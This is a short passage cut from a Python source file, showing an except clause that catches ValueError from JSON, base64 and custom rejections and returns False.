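    except ValueError:  # covers JSON, base64 and our own rejections
        return False
```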